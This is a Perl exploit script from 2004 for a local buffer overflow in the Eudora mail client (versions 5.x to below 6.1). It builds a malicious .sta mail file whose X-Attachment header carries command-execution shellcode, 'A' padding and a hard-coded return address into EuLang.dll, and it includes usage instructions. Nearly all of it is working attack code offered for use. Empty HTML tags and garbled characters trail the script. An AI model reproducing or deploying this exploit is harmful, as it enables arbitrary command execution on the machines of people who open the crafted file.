# Author: LibX (libx@easydoesit.com) # Date: 29-06-2004 # Exploit #: 1 # Program: Eudora # Tested on: v5.1 / v6.0.1.1 / v6.0.22 / v6.0.3 All English (NT/2K/XP all service packs) # Exploit Type: Local Buffer overflow # Shellcode: Shellcode to execute a command # Shellcode version: v2.5 PRIVATE (GENERIC) # How-tu-use: EudExploit.pl > .sta if(!($ARGV[0])) { print("Eudora v5.x to <6.1 attachment bufferoverflow exploit v2.5"); print("Usage: EudExploit.pl > .sta\n\n"); print("Sample: EudExploit.pl notepad.exe > TestShell.sta"); exit; } # command execution shellcode $shellcode = "\xEB\x6D\x5F\xB9\x11\x11\x11\x11" . "\x89\xCB\xFC\xB0\xFF\xF2\xAE\x87" . "\xD9\x29\xD9\x81\xC7\x10\x11\x11" . "\x11\x81\xEF\x11\x11\x11\x11\xFE" . "\x07\x81\xC1\x10\x11\x11\x11\x81" . "\xE9\x11\x11\x11\x11\x29\xCF\x31" . "\xF6\x46\x56\x57\xBB\x66\x8B\x45" . "\x0C\xB9\x11\x11\x11\x11\xB8\x41" . "\x11\x11\x11\x2D\x32\x11\x11\x11" . "\x64\x8B\x40\x21\x8B\x40\x0C\x8B" . "\x70\x1C\xAD\x8B\x78\x08\x47\xB0" . "\x66\xF2\xAE\xEB\x01\x90\x4F\xFF" . "\x37\x5E\x39\xF3\x74\x02\xEB\xEE" . "\x8D\x47\xEA\xFF\xD0\xCD\x03\xE8" . "\x8E\xFF\xFF\xFF" . $ARGV[0] . "\xFF"; # some crap $buffer = "A" x (268 - length($shellcode)); # EuLang.dll universal return address (625010E9: call edi) $return = "\xE9\x10\x50\x62"; print("From: me\n"); print("To: you\n"); print("Subject: Eudora 5.x/<6.1 buffer overflow exploit\n"); print("X-Attachment: " . $shellcode . $buffer . $return . "\n\n");
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß